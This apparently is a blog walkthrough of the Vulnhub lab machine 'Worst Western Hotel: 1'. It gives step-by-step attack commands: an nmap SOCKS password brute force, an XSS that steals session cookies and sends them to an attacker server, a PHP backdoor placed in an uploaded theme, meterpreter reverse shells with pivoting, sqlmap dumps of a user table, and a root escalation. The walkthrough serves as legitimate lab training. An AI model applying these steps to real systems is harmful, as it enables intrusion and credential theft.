Vulnhub Worst Western Hotel: 1 Walkthrough!!!
This is really a very good machine, It has brute forcing socks proxy, accessing the web app through socks, exploiting the XSS to steal admin session cookies. Grabbing the credentials from one of the images, use these credentials to login into the web app as admin, then exploit it to get RCE. Once you got the shell, you came to know that you are in Docker.ifconfig shows different network. Use msfvenom to create the meterpreter reverse shell payload. Get meterpreter shell using metasploit. Adding route to the meterpreter session and using socks proxy. Then exploit SQL Injection to extract the database username and password. SSH into the box and exploiting PHP capabilities to root the box.
So this machine covers attack vectors like brute-forcing, XSS to steal the session cookies, routing through meterpreter, port forwarding, socks,SQLi. The creator did a fantastic work here. So lets begin with nmap…..
Find all open ports on the box.
Service version detection using nmap.
When I visit port 80 in browser it was showing “prime.worstwestern.com”, make an entry for this in hosts file after that below page get loaded in the browser.
I used dirb first with few extensions like .txt,.php,.zip etc. It gave me an interesting file config.txt.
I opened this in the browser and got below information.
This file is pointing towards another network, and it has Username & Password. The nmap scan showed socks5 proxy on 1080 port which required authentication, I used username and password mentioned in config file,but it did not work. Then I used nmap socks-brute script to brute-force password with username as Prime.
nmap — script socks-brute — script-args userdb=/tmp/users,passdb=/usr/share/wordlists/rockyou.txt -p 1080 <IP-addr>-v
I got valid password. “tinkerball1”. Now configure the proxychians file and add entry for socks5 <IP of the box> 1080 Prime tinkerball1. Used nmap with proxychains to scan network range 192.168.1.0/24 and found IP address 192.168.1.124.
Scan the IP address 192.168.1.124 with nmap on common ports like 22,80,443 below is the result.
Opening the IP in browser with or without HTTPS, gives below page.
As per hint, by the creator of the box, there might be stored XSS in Username field.
So we need to use an XSS payload which steals session cookies, if any, and sent it to attacker controlled server. I used the payload and script from this link and host SimpleHttp Python Server on Kali and sent the payload in the username field. Wait for a few minutes and I start getting PHP session cookies.
Reused the PHPSession cookie and got access to the page hosted on 192.168.1.124.
The website displayed the images as we are seeing it camera and below image has very interesting information.
The image has username and password [peterg:Birdistheword]. I again scan the original IP address of the box with dirb and got below result.
It is showing adminpanel.
I used above credentials to log into the web application.
Here I spent lots of time to figure out how how can I exploit this app. I contacted the creator of box and he told me we need to upload a Theme with a PHP backdoor in it. In the web application, it has a functionality to download the current theme.
Navigate to Preferences → Themes. Click on export theme. Once downloaded, go to themes hotel-reservation-theme/lang/index.php. Add the PHP backdoor in it.
Create a .zip file from the theme we downloaded and upload it. So navigate to preferences → Themes → AddNew Theme. Upload the theme (.zip file)
Now navigate to the /themes/name-of-your-theme/lang/index.php?cmd=id and got RCE.
Used python reverse shell payload to get the shell.
But if you look closely, we are in another network 192.168.0.0/24. At this point I used msfvenom payload and metasplit to get the meterpreter shell.
Generated meterpreter reverse shell payload using msfvenom and downloaded it on the box.
Started the metasploit and used exploit/multi/handler. Then used payload linux/x64/meterpreter/reverse_tcp and run it. In victim executed the payload file and got the meterpreter shell.
As we need to scan the network through meterpreter, added the route and also starts the socks proxy. Also make an entry for 127.0.0.1 1080 in proxychains configuration file.
Used nmap to scan the 192.168.0.0 and found 192.168.0.1 up. Scan it for common ports 22,80 and 443 below are the results.
When you visit the IP 192.168.0.1 in browser it points to crm.worstwestern.com you need to add it to the hosts file. It was not working for me so I used portfwd in meterpreter and forward it to my localhost:443 for 192.168.0.1:443. It has below page.
Both the above pages are vulnerable to SQLi. I capture the POST request of the Forget Password page and used SQLmap to retrieve the data.
To retrieve the databases, I used below command.
sudo sqlmap -r localhost_forget_pass — force-ssl — dbms mysql — dbs.
So we have the crm database. Time to enumerate the tables for that I used
sudo sqlmap -r localhost_forget_pass — force-ssl — dbms mysql -D crm — tables
Then I retrieved the data in the user table.
sudo sqlmap -r localhost_forget_pass — force-ssl — dbms mysql -D crm -T user — dump
The table has different password for the peterg lets use it for ssh.
Added another port forward to access port 22.
Used the username peterg and the password TheBirdIsTheWord to ssh into the box and we are peterg now.
Uploaded the linpPEAS.sh on the box and run it. Below is the binaries with capabilities.
Gtfobins show below result for the PHP capabilities.
And we are root…
So this is it, really a gr8 machine enjoyed it a lot. Hope you enjoy the write-up. Thanks for reading.